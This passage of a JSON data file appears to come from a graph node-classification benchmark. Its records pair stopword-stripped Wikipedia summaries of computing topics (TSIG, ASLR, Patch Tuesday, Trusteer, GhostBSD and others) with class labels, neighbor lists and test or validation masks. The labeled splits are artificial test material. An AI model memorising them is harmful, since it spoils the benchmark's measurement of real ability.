windows exist written poseidon d-ide entice designer applications debugged using c/c++ debugger like gdb windbg although support various d-specific language features extremely limited windows programs debugged using ddbg microsoft debugging tools windbg visual studio converted debug information using cv2pdb zerobugs debugger linux experimental support language ddbg used various ides command line zerobugs graphical user interface gui example program prints command line arguments codice_18 function entry point program codice_19 array strings representing command line arguments codice_20 array characters represented codice_21 d1 codice_22 d2 codice_1 statement iterate collection case producing sequence indexes codice_24 values codice_25 array codice_19 index codice_24 value codice_25 types inferred type array codice_19 following shows several capabilities design trade-offs short program iterates lines text file named codice_30 contains different word line prints words anagrams words notable organisations use programming language projects include facebook ebay netflix successfully used aaa games javascript virtual machine operating system kernel gpu programming web development numerical analysis gui applications passenger information system",
    "neighbors": [
      9224,
      2576,
      1556,
      2585,
      3613,
      9245,
      5154,
      8739,
      2603,
      2605,
      5677,
      7728,
      2045,
      1586,
      5684,
      1591,
      9794,
      8771,
      10819,
      4173,
      595,
      84,
      4182,
      10841,
      102,
      7274,
      5743,
      8303,
      8304,
      9331,
      9848,
      5754,
      7292,
      9345,
      1666,
      5255,
      1673,
      2186,
      4747,
      6797,
      9875,
      148,
      3734,
      155,
      8866,
      7347,
      8883,
      190,
      8385,
      6338,
      9921,
      10435,
      9926,
      7889,
      9425,
      4822,
      6875,
      10470,
      10478,
      1776,
      10480,
      5363,
      2804,
      5880,
      7421,
      2304,
      11017,
      8973,
      9491,
      1812,
      5917,
      6941,
      10526,
      7983,
      9008,
      7987,
      823,
      7479,
      1347,
      1348,
      1349,
      11589,
      1353,
      5961,
      8531,
      10581,
      7513,
      10586,
      8539,
      348,
      6493,
      8545,
      9569,
      11625,
      8554,
      9579,
      7020,
      8057,
      380,
      11135,
      1920,
      3462,
      4998,
      6536,
      393,
      8587,
      9614,
      3990,
      1435,
      6555,
      10654,
      7071,
      1952,
      10143,
      10658,
      9128,
      5546,
      8618,
      4529,
      1474,
      963,
      5059,
      9666,
      4550,
      7629,
      11219,
      5588,
      11221,
      4056,
      4057,
      2010,
      477,
      4069,
      8677,
      9701,
      7662,
      6640,
      8691,
      10739,
      11259,
      2557,
      5630
    ],
    "mask": "None"
  },
  {
    "node_id": 5166,
    "label": 5,
    "text": "TSIG:tsig tsig transaction signature computer-networking protocol defined rfc 2845 primarily enables domain name system dns authenticate updates dns database commonly used update dynamic dns secondary/slave dns server tsig uses shared secret keys one-way hashing provide cryptographically secure means authenticating endpoint connection allowed make respond dns update although queries dns may usually made without authentication updates dns must authenticated since make lasting changes structure internet naming system update request may arrive via insecure channel internet one must take measures ensure authenticity integrity request use key shared client making update dns server helps ensure authenticity integrity update request one-way hashing function serves prevent malicious observers modifying update forwarding destination thus ensuring integrity message source destination timestamp included tsig protocol prevent recorded responses reused would allow attacker breach security tsig places requirement dynamic dns servers tsig clients contain accurate clock since dns servers connected network network time protocol provide accurate time source dns updates like queries normally transported via udp since requires lower overhead tcp however dns servers support udp tcp requests update specified rfc 2136 set instructions dns server include header zone updated prerequisites must satisfied record updated tsig adds final record includes timestamp hash request also includes name secret key used sign request rfc 2535 recommendations form name response successful tsig update also signed tsig record failures signed prevent attacker learning anything tsig key using specially crafted update probes nsupdate program use tsig dns updates tsig record format records update request meaning fields described rfc 1035 although tsig widely deployed several problems protocol result number alternatives extensions proposed",
    "neighbors": [
      929,
      2887,
      10344,
      3018,
      10924,
      6797,
      6098,
      11250,
      11413
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5167,
    "label": 6,
    "text": "EXOFS:exofs exofs formerly known osdfs object-based file system implemented top external object store name stands extended object file system referring use ext2-based metadata object storage devices exofs originally developed avishay traeger ibm hrl originally based ext2 file system since 2008 panasas develops maintains exofs open-osd.org exofs included mainline linux kernel since version 2.6.30-rc1 linux distribution implemented utility making file systems exofs current kernel line removed version 5.1-rc1",
    "neighbors": [
      9762,
      7983,
      2901,
      2197,
      823,
      9277
    ],
    "mask": "None"
  },
  {
    "node_id": 5168,
    "label": 9,
    "text": "FP_(programming_language):fp programming language fp short function programming programming language created john backus support function-level programming paradigm allows eliminating named variables language introduced backus 1977 turing award lecture programming liberated von neumann style subtitled functional style algebra programs paper sparked interest functional programming research eventually leading modern functional languages function-level paradigm backus hoped fp never found much use outside academia 1980s backus created successor language fl remained research project values fp programs map one another comprise set closed sequence formation values built set atoms booleans integers reals characters etc ⊥ undefined value bottom sequences bottom-preserving fp programs functions f map single value x another functions either primitive i.e. provided fp environment built primitives program-forming operations also called functionals example primitive function constant transforms value x constant-valued function x̄ functions strict another example primitive function selector function family denoted 1,2 ... contrast primitive functions functionals operate functions example functions unit value 0 addition 1 multiplication functional unit produces value applied function f one core functionals fp addition constructed primitives functionals function may defined recursively equation simplest kind e f expression built primitives defined functions function symbol f using functionals fp84 extension fp include infinite sequences programmer-defined combining forms analogous backus added fl successor fp lazy evaluation unlike ffp another one backus variations fp fp84 makes clear distinction objects functions i.e. latter longer represented sequences former fp84 extensions accomplished removing fp restriction sequence construction applied non -⊥ objects fp84 entire universe expressions including whose meaning ⊥ closed sequence construction fp84 semantics embodied underlying algebra programs set function-level equalities may used manipulate reason programs",
    "neighbors": [
      9345,
      1826,
      3876,
      8262,
      2216,
      6536,
      7627,
      2670,
      8722,
      11219,
      2774,
      2519,
      1976,
      5081
    ],
    "mask": "Test"
  },
  {
    "node_id": 5169,
    "label": 4,
    "text": "Inference_attack:inference attack inference attack data mining technique performed analyzing data order illegitimately gain knowledge subject database subject sensitive information considered leaked adversary infer real value high confidence example breached information security inference attack occurs user able infer trivial information robust information database without directly accessing object inference attacks piece together information one security level determine fact protected higher security level",
    "neighbors": [
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5170,
    "label": 6,
    "text": "CloudStore:cloudstore cloudstore kfs previously kosmosfs kosmix c++ implementation google file system parallels hadoop project implemented java programming language cloudstore supports incremental scalability replication checksumming data integrity client side fail-over access c++ java python fuse module file system mounted linux september 2007 kosmix published kosmosfs open source last commit activity 2010 google code page kosmosfs points quantcast file system github successor kfs former project sourceforge used name cloudstore 2008",
    "neighbors": [
      1801,
      5677,
      3795,
      7155,
      11221,
      823,
      2395,
      6591
    ],
    "mask": "None"
  },
  {
    "node_id": 5171,
    "label": 2,
    "text": "Utah_GLX:utah glx utah glx project aimed creating fully free open-source basic hardware-accelerated 3d renderer using opengl rendering api linux kernel-based operating systems utah glx predates direct rendering infrastructure used 2014 john d. carmack worked utah glx",
    "neighbors": [
      9604,
      10971,
      5492,
      4902
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5172,
    "label": 4,
    "text": "Trusteer:trusteer trusteer portfolio digital identity trust software products belonging ibm security founded mickey boodaei rakesh k. loonkar israel 2006 trusteer acquired september 2013 ibm 1 billion highest valuation multiple ibm ever paid business ibm trusteer helps organizations seamlessly establish digital identity trust across web customer journey cloud-based intelligence backed ai patented machine learning trusteer provides holistic approach identifying new existing customers without negatively impacting user experience 500 leading organizations rely trusteer help enable secure customers ’ digital journey support business growth trusteer presence north america south america europe africa japan ibm trusteer helps brands accelerate digital growth establishing digital identity trust across channels helping recognize customers deter bad actors trusteer rapport adaptive endpoint solution helps protect financial institutions end-users transparently detecting protecting financial malware infections phishing attacks account takeover provides comprehensive security layer anti-virus software typically designed address financial malicious activity software service offering uses 24/7 threat intelligence including geographic customize detection matrix address new threats real-time including attacking specific financial institution used leading financial institutions worldwide trusteer rapport combines global footprint millions endpoints years threat data analysis experience innovative technology achieve high rates detection low false positives increasingly sophisticated financial threat environment specifically trusteer rapport detects alerts organization pharming phishing screenshots overlays financial malware advises end-user account risk compromised moment installed end-user ’ computer trusteer rapport immediately checks removes existing financial malware malicious patches starts performing continuous transparent monitoring kernel operating system browser application levels protect new threats trusteer rapport supports browser extensions google chrome microsoft edge apple safari mozilla firefox supports microsoft internet explorer use trusteer rapport end-users simply install rapport browser extension web browser choice trusteer rapport compatible microsoft windows 7 higher multiple mac os x versions supported browsers platforms end-users download trusteer rapport free charge financial institutions offer software free charge offer safer online banking customers organizations also acquire trusteer mobile sdk extend protection native mobile applications trusteer pinpoint platform digital identity trust lifecycle platform designed provide b2c access management dynamically managing digital identity trust web mobile applications platform made three products trusteer pinpoint platform allows organizations improve digital customer journey single platform dynamically manage risk-based seamless authentication user-friendly step-up authentication establish trust identity proofing new guest users happens need validate new anonymous customer user true customer intent initiating payment fraud abusing loyalty program guests new customers let unimpeded ones complete step-up authentication using advanced intelligence global visibility ibm trusteer pinpoint™ assure solution designed help detect predict risk fraudulent intent new guest customers also enables companies conduct early account monitoring new accounts ’ type insight ’ critical reducing abandonment caused friction security measures increasing loyalty program registrations growing digital channel sustain trust continuous authentication trusted users better protect customer accounts payment journeys compromised detecting account takeovers unauthorized logins activity requires comprehensive view account access device session user perspective ibm trusteer pinpoint detect delivers kind visibility using behavioral biometric capabilities behavioral analytics transparently build user profiles continually authenticate online identities using machine learning patented analytics platform analyzes patterns mouse movements astonishing speeds volumes differentiate account user ’ “ normal ” digital behavior abnormal behavior insight combined device activity evidence transactional data geolocation data either abnormal user behavior known fraudster behavior detected trusteer pinpoint detect provides recommended action real-time along detailed reasoning session details organization take steps confirm trust necessary confirm trust combine risk assessment strong adaptive authentication confirm trust abnormal user behavior suspicious activity identified ibm trusteer pinpoint verify cloud-based authentication service seamlessly integrates pinpoint assure pinpoint detect help companies apply strong step-up authentication necessary application developers simply use exposed interfaces service challenge users perform second factor authentication via digital application users choose enroll various forms two-factor authentication one-time passcodes via email sms mobile push notification biometric authentication trusteer pinpoint products use context- based intelligence combining device id proxy emulator detection malware remote access trojan rat infection detection bot detection email phone number intelligence account history patterns behavioral biometrics navigation session analysis determine trust risk level associated user trusteer mobile sdk helps organizations build digital identity trust mobile confidence customers differentiating trusted mobile devices users suspicious ones exposes real-time mobile risk allow account compromise mitigation proactively detects mobile device risk native mobile applications available standalone assessing risk indicators mobile device integrates ibm trusteer pinpoint digital identity trust platform use threat intelligence correlate mobile device user behavior account risk factors across digital channels specifically ibm trusteer mobile sdk generates strong persistent global device id uses robust set capabilities detect mobile device risks real-time applies machine learning analytics offer actionable insights suspicious mobile user behavior threat detection capabilities include real-time overlay attacks emulators sms stealers remote access tools rats insecure wi-fi networks active pharming rooting jailbreaking uses server-side trusteer pinpoint capabilities correlated aggregated awareness device anomalies user behavior account risk indicators—such account takeover phishing attacks malware infections compromised credentials advanced evasion methods—across digital channels also works seamlessly trusteer pinpoint platform detect protect mobile device fraudulent activity early digital account creation process guest user new mobile device introduced trusteer apex automated solution tries prevent exploits malware compromising endpoints extracting information apex three layers security exploit prevention data exfiltration prevention credentials protection apex protects employee credentials phishing attacks validating employees submitting credentials authorized enterprise web-application login urls apex also prevents corporate employees re-using corporate credentials access non-corporate public applications like paypal e-bay facebook twitter apex requires users provide different credentials applications lower risk credentials exposure trusteer apex targeted behaviors small group applications hypothesis responsible overwhelming majority exploits namely java adobe ’ reader flash microsoft ’ office technology behind trusteer apex rely threat signatures so-called whitelists good applications instead watches applications run spots suspicious malicious behavior based knowledge normal application behavior refined large user base trusteer claims apex block web-based attacks used implant malware exploiting vulnerable applications data loss due malware infections spotting attempts untrusted applications processes send data outside organization connect internet-based command control c c networks end users reported problems rapport slow pcs due high cpu ram utilization incompatibility various security/antivirus products difficulty removing software presentation given 44con september 2011 bypassing trusteer rapport keylogger protection shown relatively trivial shortly thereafter trusteer confirmed flaw corrected said even hacker able use flaw disable anti-keylogging functions rapport secondary security protection technologies would still play rapport software incompatible windows tool driver verifier may cause blue screen system crash since driver verifier intended end users production environment workstations trusteer support recommends end users run driver verifier trusteer endpoint protection installed march 2011 blue gem rival company filed lawsuit trusteer california court blue gem accused trusteer plagiarizing code order maintain compatibility anti-keystroke logging software types intel chipset first introduced back 2007 trusteer described accusations baseless",
    "neighbors": [
      10915,
      3941,
      6311,
      5450,
      8792,
      5006,
      9455,
      8978,
      10040,
      6484,
      9397,
      278,
      10291,
      3960,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 5173,
    "label": 4,
    "text": "Patch_Tuesday:patch tuesday patch tuesday also known update tuesday unofficial term used refer microsoft regularly releases software patches software products widely referred way industry microsoft formalized patch tuesday october 2003 patch tuesday occurs second sometimes fourth tuesday month north america far integrated windows update wu function concerned patch tuesday begins 18:00 17:00 utc 10:00 pst utc−8 10:00 pdt utc−7 updates show download center added wu kb articles technet bulletin unlocked later microsoft pattern releasing larger number updates even-numbered months fewer odd-numbered months minor updates also released outside patch tuesday daily updates consist malware database refreshes windows defender microsoft security essentials sometimes extraordinary patch tuesday two weeks regular patch tuesday updates could released time starting windows 98 microsoft included windows update installed executed would check patches windows components microsoft would release intermittently release microsoft update system also checks updates microsoft products microsoft office visual studio sql server earlier versions windows update suffered two problems microsoft introduced patch tuesday october 2003 reduce cost distributing patches system accumulates security patches month dispatches second tuesday month event system administrators may prepare following day informally known exploit wednesday marks time exploits may appear wild take advantage unpatched machines newly announced vulnerabilities tuesday chosen optimal day week distribute software patches done maximize amount time available upcoming weekend correct issues might arise patches leaving monday free address unanticipated issues might arisen preceding weekend obvious security implication security problems solution withheld public month policy adequate vulnerability widely known extremely obscure always case cases vulnerability information became public actual worms circulating prior next scheduled patch tuesday critical cases microsoft issues corresponding patches become ready alleviating risk updates checked installed frequently ignite 2015 event microsoft revealed change distributing security patches release security updates home pcs tablets phones soon ready enterprise customers stay monthly update cycle reworked windows update business many exploitation events seen shortly release patch analysis patch helps exploit developers immediately take advantage previously undisclosed vulnerability remain unpatched systems therefore term exploit wednesday coined microsoft warned users discontinued support windows xp starting april 8 2014 users running windows xp afterwards would risk attacks security patches newer windows versions reveal similar vulnerabilities present newer older windows versions allow attacks devices unsupported windows versions c.f zero-day attacks however microsoft stopped fixing vulnerabilities unsupported windows versions regardless widely known vulnerabilities became leaving vulnerabilities unfixed devices running windows versions vulnerable attacks microsoft made singular exception rapid spread wannacry ransomware released patches may 2017 unsupported windows xp windows 8 windows server 2003 addition supported windows versions windows vista extended support ended april 11 2017 leave vulnerabilities discovered afterwards unfixed creating situation vista xp windows 7 service pack 1 support already run without support end january 14 2020 january 10 2023 windows 8.1 cause unfixed vulnerabilities issue users operation systems support windows 8 already ended january 12 2016 users install windows 8.1 windows 10 continue get support support windows 7 without sp1 ended april 9 2013 ability install sp1 continue get support 2020 install windows 8.1 windows 10 receive support 2020 one major change introduction windows 10 microsoft started release new version windows 10 twice per year microsoft modern lifecycle policy newly released windows 10 version starts grace period previous version regard support unlike previous windows products received infrequent updates via service packs support governed fixed lifecycle policy new policy home pro versions windows 10 provided security feature updates called mainstream support 18 months release enterprise education versions 24 months give example support windows 10 home/pro version 1703 released april 2017 stopped microsoft october 2018 support versions 1507 1511 released 2015 officially ended 2017 microsoft announced would give extended support security feature updates least one semi-annual channel sac windows 10 version october 14 2025 according microsoft device needs install latest version feature update current version reaches end service help keep device secure remain supported microsoft previous windows operating systems device running unsupported version windows longer receives security patches potentially affected unfixed vulnerabilities issue beginning end support date counter microsoft designed update system home pro editions windows 10 cases technically possible latest windows version downloaded installed automatically however drawn criticism due problems forced upgrades introduce addition commonly used editions like home pro microsoft offers specialized long-term servicing branch ltsb long-term servicing channel ltsc versions windows 10 longer support timelines governed microsoft fixed lifecycle policy e.g windows 10 enterprise 2016 ltsb receive extended support october 13 2026 sap security patch day company advises users install security updates chosen coincide patch tuesdays adobe systems update schedule flash player since november 2012 also coincides patch tuesday one reasons flash player comes part windows starting windows 8 flash player updates built-in plugin based version need published time order prevent reverse-engineering threats windows update uses background intelligent transfer service bits download updates using idle network bandwidth however bits use speed reported network interface nic calculate bandwidth lead bandwidth calculation errors example fast network adapter e.g 10 mbit/s connected network via slow link e.g 56 kbit/s according microsoft bits compete full bandwidth nic ... bits visibility network traffic beyond client furthermore windows update servers microsoft honor tcp slow-start congestion control strategy result users network may experience significantly slower connections machines actively retrieving updates particularly noticeable environments many machines individually retrieve updates shared bandwidth-constrained link found many multi-pc homes small medium-sized businesses bandwidth demands patching large numbers computers reduced significantly deploying windows server update services wsus distribute updates locally addition updates downloaded microsoft servers windows 10 devices share updates peer-to-peer fashion windows 10 devices local network even windows 10 devices internet potentially distribute updates faster reducing usage networks metered connection",
    "neighbors": [
      1417,
      6797,
      3473,
      10132,
      4117,
      11030,
      3867,
      2041,
      10398,
      9375,
      10924,
      7739,
      10173,
      8640,
      10957,
      5210,
      7515,
      9695,
      3944,
      6265
    ],
    "mask": "None"
  },
  {
    "node_id": 5174,
    "label": 4,
    "text": "Virtual_machine_escape:virtual machine escape computer security virtual machine escape process breaking virtual machine interacting host operating system virtual machine completely isolated guest operating system installation within normal host operating system 2008 vulnerability cve-2008-0923 vmware discovered core security technologies made vm escape possible vmware workstation 6.0.2 5.5.4 fully working exploit labeled cloudburst developed immunity inc. immunity canvas commercial penetration testing tool cloudburst presented black hat usa 2009",
    "neighbors": [
      5378,
      2275,
      6153,
      7983,
      8047,
      10264,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5175,
    "label": 2,
    "text": "Nokia_N71:nokia n71 nokia n71 smartphone announced nokia november 2 2005 released june 2006 nokia joint-first clamshell smartphone like n92 announced day n71 runs symbian os v9.1 s60 3rd edition features include 2 megapixel camera built-in flash front vga camera allow real-time video calling fm radio bluetooth digital music player functionality comes standard full web browser support 3d java games also 3g mini-sd card slot expandable memory features include ability transfer data via w-cdma 2100 gprs edge nokia promotes n71 2-megapixel digital rear camera producing high-quality photography video well music radio functionality phone multimedia mini-sd card means hold 2 gigabytes equating potentially hundreds tracks according nokia specifications",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 5176,
    "label": 2,
    "text": "Address_space_layout_randomization:address space layout randomization address space layout randomization aslr computer security technique involved preventing exploitation memory corruption vulnerabilities order prevent attacker reliably jumping example particular exploited function memory aslr randomly arranges address space positions key data areas process including base executable positions stack heap libraries linux pax project first coined term aslr published first design implementation aslr july 2001 patch linux kernel seen complete implementation providing also patch kernel stack randomization since october 2002 first mainstream operating system support aslr default openbsd version 3.4 2003 followed linux 2005 address space randomization hinders types security attacks making difficult attacker predict target addresses example attackers trying execute return-to-libc attacks must locate code executed attackers trying execute shellcode injected stack find stack first cases system obscures related memory-addresses attackers values guessed mistaken guess usually recoverable due application crashing address space layout randomization based upon low chance attacker guessing locations randomly placed areas security increased increasing search space thus address space randomization effective entropy present random offsets entropy increased either raising amount virtual memory area space randomization occurs reducing period randomization occurs period typically implemented small possible systems must increase vma space randomization defeat randomization attackers must successfully guess positions areas wish attack data areas stack heap custom code useful data loaded one state attacked using nop slides code repeated copies data allows attack succeed area randomized one handful values contrast code areas library base main executable need discovered exactly often areas mixed example stack frames injected onto stack library returned following variables declared calculate probability attacker succeeding assume number attempts carried without interrupted signature-based ips law enforcement factor case brute forcing daemon restarted also figure many bits relevant many attacked attempt leaving however many bits attacker defeat following formulas represent probability success given set attempts bits entropy many systems formula_14 thousands millions 64-bit systems numbers typically reach millions least hector marco-gisbert ismael ripoll showed 2014 bypass aslr 64-bit systems less one second certain circumstances 32-bit systems 2004 computer speeds 16 bits address randomization shacham co-workers state ... 16 bits address randomization defeated brute force attack within minutes authors statement depends ability attack application multiple times without delay proper implementations aslr like included grsecurity provide several methods make brute force attacks infeasible one method involves preventing executable executing configurable amount time crashed certain number times android possibly systems implement library load order randomization form aslr randomizes order libraries loaded supplies little entropy approximation number bits entropy supplied per needed library appears yet account varied library sizes actual entropy gained really somewhat higher note attackers usually need one library math complex multiple libraries shown well note case attacker using one library simplification complex formula formula_15 values tend low even large values importantly since attackers typically use c standard library thus one often assume formula_17 however even small number libraries bits entropy gained thus potentially interesting combine library load order randomization vma address randomization gain extra bits entropy note extra bits entropy apply mmap segments libraries attackers may make use several methods reduce entropy present randomized address space ranging simple information leaks attacking multiple bits entropy per attack heap spraying little done possible leak information memory layout using format string vulnerabilities format string functions printf use variable argument list job format specifiers describe argument list looks like way arguments typically passed format specifier moves closer top stack frame eventually return pointer stack frame pointer extracted revealing address vulnerable library address known stack frame completely eliminate library stack randomization obstacle attacker one also decrease entropy stack heap stack typically must aligned 16 bytes smallest possible randomization interval heap must page-aligned typically 4096 bytes attempting attack possible align duplicate attacks intervals nop slide may used shellcode injection string replaced arbitrary number slashes attempting return system number bits removed exactly formula_18 intervals attacked decreases limited due amount data stack heap stack example typically limited grows much less allows although conservative estimate would around 8– corresponding 4– stack stuffing heap hand limited behavior memory allocator case glibc allocations 128 kb created using mmap limiting attackers 5 bits reduction also limiting factor brute forcing although number attacks perform reduced size attacks increased enough behavior could circumstances become apparent intrusion detection systems aslr-protected addresses leaked various side channels removing mitigation utility recent attacks used information leaked cpu branch target predictor buffer btb memory management unit mmu walking page tables clear class aslr attack mitigated benefit aslr reduced eliminated several mainstream general-purpose operating systems implement aslr android 4.0 ice cream sandwich provides address space layout randomization aslr help protect system third party applications exploits due memory-management issues position-independent executable support added android 4.1 android 5.0 dropped non-pie support requires dynamically linked binaries position independent library load ordering randomization accepted android open-source project 26 october 2015 included android 7.0 release dragonfly bsd implementation aslr based upon openbsd model added 2010 default enabled setting sysctl vm.randomize_mmap 1 support aslr appear freebsd 13.0 currently development disabled default apple introduced aslr ios 4.3 released march 2011 kaslr introduced ios 6 randomized kernel base 0x01000000 1+0xrr 0x00200000 0xrr random byte sha1 random data generated iboot 2nd-stage ios boot loader linux kernel enabled weak form aslr default since kernel version 2.6.12 released june 2005 pax exec shield patchsets linux kernel provide complete implementations exec shield patch linux supplies 19 bits stack entropy period 16 bytes 8 bits mmap base randomization period 1 page 4096 bytes places stack base area 8 mb wide containing 524,288 possible positions mmap base area 1 mb wide containing 256 possible positions position-independent executable pie implements random base address main executable binary place since 2003 provides address randomness main executable used shared libraries pie feature use network facing daemons – pie feature used together prelink feature executable prelink tool implements randomization prelink time rather runtime design prelink aims handle relocating libraries dynamic linker allows relocation occur many runs program result real address space randomization would defeat purpose prelinking randomization disabled specific process changing execution domain using personality 2 kernel address space layout randomization kaslr bringing support address space randomization running linux kernel images randomizing kernel code placed boot time merged linux kernel mainline kernel version 3.14 released 30 march 2014 compiled disabled boot time specifying one kernel boot parameters several side-channel attacks x86 processors could leak kernel addresses late 2017 kernel page-table isolation kpti aka kaiser developed defeat attacks however method protect side-channel attacks utilizing collisions branch predictor structures microsoft windows vista released january 2007 later aslr enabled executables dynamic link libraries specifically linked aslr-enabled compatibility enabled default applications typically older software incompatible aslr fully enabled editing registry entry hklm\\system\\currentcontrolset\\control\\session manager\\memory management\\moveimages installing microsoft enhanced mitigation experience toolkit locations heap stack process environment block thread environment block also randomized security whitepaper symantec noted aslr 32-bit windows vista may robust expected microsoft acknowledged weakness implementation host-based intrusion prevention systems wehntrust ozone also offer aslr windows xp windows server 2003 operating systems wehntrust open-source complete details ozone implementation available noted february 2012 aslr 32-bit windows systems prior windows 8 effectiveness reduced low memory situations similar effect also achieved linux research test code caused mac os x 10.7.3 system kernel panic left unclear aslr behavior scenario support aslr userland appeared netbsd 5.0 released april 2009 enabled default netbsd-current april 2016 kernel aslr support amd64 added netbsd-current october 2017 making netbsd first bsd system support kaslr 2003 openbsd became first mainstream operating system support strong form aslr activate default openbsd completed aslr support 2008 added support pie binaries openbsd 4.4 malloc 3 designed improve security taking advantage aslr gap page features implemented part openbsd codice_3 system call detect use-after-free bugs released 2013 openbsd 5.3 first mainstream operating system enable position-independent executables default multiple hardware platforms openbsd 5.7 activated position-independent static binaries static-pie default mac os x leopard 10.5 released october 2007 apple introduced randomization system libraries mac os x lion 10.7 released july 2011 apple expanded implementation cover applications stating address space layout randomization aslr improved applications available 32-bit apps heap memory protections making 64-bit 32-bit applications resistant attack os x mountain lion 10.8 released july 2012 later entire system including kernel well kexts zones randomly relocated system boot aslr introduced solaris beginning solaris 11.1 released october 2012 aslr solaris 11.1 set system-wide per zone per-binary basis side-channel attack utilizing branch target buffer demonstrated bypass aslr protection 2017 attack named aslr⊕cache demonstrated could defeat aslr web browser using javascript",
    "neighbors": [
      8576,
      642,
      1922,
      5636,
      8066,
      3462,
      3473,
      11537,
      11539,
      8852,
      7702,
      1820,
      2717,
      2467,
      4389,
      7717,
      5799,
      8231,
      9854,
      2732,
      5040,
      9393,
      435,
      11188,
      10933,
      823,
      6968,
      5054,
      1474,
      3395,
      3270,
      4423,
      5065,
      1103,
      7760,
      9424,
      1106,
      3283,
      4562,
      8531,
      3286,
      11605,
      9432,
      5598,
      7135,
      8545,
      6754,
      7139,
      8551,
      4074,
      10732,
      2804,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5177,
    "label": 2,
    "text": "GhostBSD:ghostbsd ghostbsd unix-like operating system based trueos mate default desktop environment gnome previous desktop environment xfce-desktop community based edition aims easy install ready-to-use easy use project goal combine security privacy stability usability openness freedom free charge prior ghostbsd 18.10 project based freebsd may 2018 announced future versions operating system based trueos beginning ghostbsd 18.10 project moved base freebsd trueos following trueos based ghostbsd releases ghostbsd originally licensed 3-clause bsd license revised bsd license new bsd license modified bsd license 2014 eric turgeon re-licensed ghostbsd 2-clause license simplified bsd license freebsd license ghostbsd contains gpl-licensed software following minimum recommended requirements",
    "neighbors": [
      7552,
      7425,
      2179,
      2180,
      1927,
      1801,
      10761,
      274,
      5397,
      8725,
      9625,
      1946,
      4636,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      7983,
      9009,
      11184,
      11698,
      11573,
      1718,
      9784,
      1465,
      5819,
      7483,
      3006,
      9151,
      11459,
      9927,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      607,
      3551,
      7521,
      2786,
      1891,
      6371,
      998,
      9320,
      4073,
      9452,
      8816,
      2545,
      3058,
      5363,
      7027,
      2421,
      9201,
      9844,
      2424,
      1273,
      11506,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 5178,
    "label": 4,
    "text": "F5_Networks:f5 networks f5 networks inc. global company specializes application services application delivery networking adn f5 technologies focus delivery security performance availability web applications well availability servers cloud resources data storage devices networking components f5 headquartered seattle washington additional development manufacturing sales/marketing offices worldwide known originally load balancing product today f5 product services line expanded things related delivery applications including local load balancing acceleration global dns based load balancing acceleration security web application firewall application authentication access products ddos defense f5 technologies available data center cloud including private public multi-cloud environments based platforms aws microsoft azure google cloud openstack f5 networks originally named f5 labs established 1996 company name inspired 1996 movie twister reference made fastest powerful tornado fujita scale f5 f5 first product launched 1997 load balancer called big-ip server went became overloaded big-ip directed traffic away server servers could handle load june 1999 company initial public offering listed nasdaq stock exchange symbol ffiv 2010 2011 f5 networks fortune list 100 fastest-growing companies company also rated one top ten best-performing stocks p 500 2010 f5 also named best place work online jobs recruiting site glassdoor 2015 2016 competitors included cisco systems 2012 citrix systems radware françois locoh-donou replaced john mcadam president ceo april 3 2017 may 3 2017 f5 announced would move longtime headquarters waterfront near seattle center new downtown seattle skyscraper called f5 tower move occur early 2019 2017 f5 launched dedicated site organization focused gathering global threat intelligence data analyzing application threats publishing related findings dubbed “ f5 labs ” nod company ’ history team continues research application threats publish findings every week benefit broader security community 2019 f5 networks occupies leading position ranking popular companies wikipedia f5 big-ip product family comprises hardware modularized software virtual appliances run f5 tmos operating system depending appliance selected one big-ip product modules added offerings include september 7 2004 f5 networks released version 9.0 big-ip software addition appliances run software version 9.0 also marked introduction company tmos architecture significant enhancements including subsequent releases enhanced performance improves application security supported cloud application deployments f5 describes big-iq framework managing big-ip devices application services irrespective form factors hardware software cloud deployment model on-premises private/public cloud hybrid big-iq supports integration ecosystem participants public cloud providers orchestration engines cloud connectors set open restful apis big-iq uses multi-tenant approach management allows organizations move closer service without concern might affect stability security services fabric silverline cloud-based application service offerings include security services waf ddos protection services 2017 company introduced technologies make f5 capabilities portable across broader range environments including",
    "neighbors": [
      2049,
      2563,
      550,
      10790,
      9262,
      8753,
      2098,
      569,
      5178,
      9279,
      64,
      2118,
      8269,
      5201,
      2134,
      94,
      1118,
      4194,
      7786,
      7791,
      8816,
      4722,
      4725,
      7809,
      2705,
      1172,
      3732,
      161,
      3237,
      8358,
      3243,
      1708,
      6318,
      6834,
      1216,
      10433,
      4814,
      9423,
      10451,
      6364,
      225,
      5860,
      3302,
      10987,
      9452,
      8943,
      9971,
      9465,
      1273,
      5371,
      9983,
      1792,
      9987,
      9496,
      6431,
      10531,
      8998,
      3885,
      5938,
      823,
      5433,
      11073,
      1858,
      331,
      4953,
      2907,
      11104,
      3942,
      2409,
      4480,
      6018,
      3482,
      4511,
      5057,
      11203,
      7121,
      10708,
      4568,
      8670,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 5179,
    "label": 2,
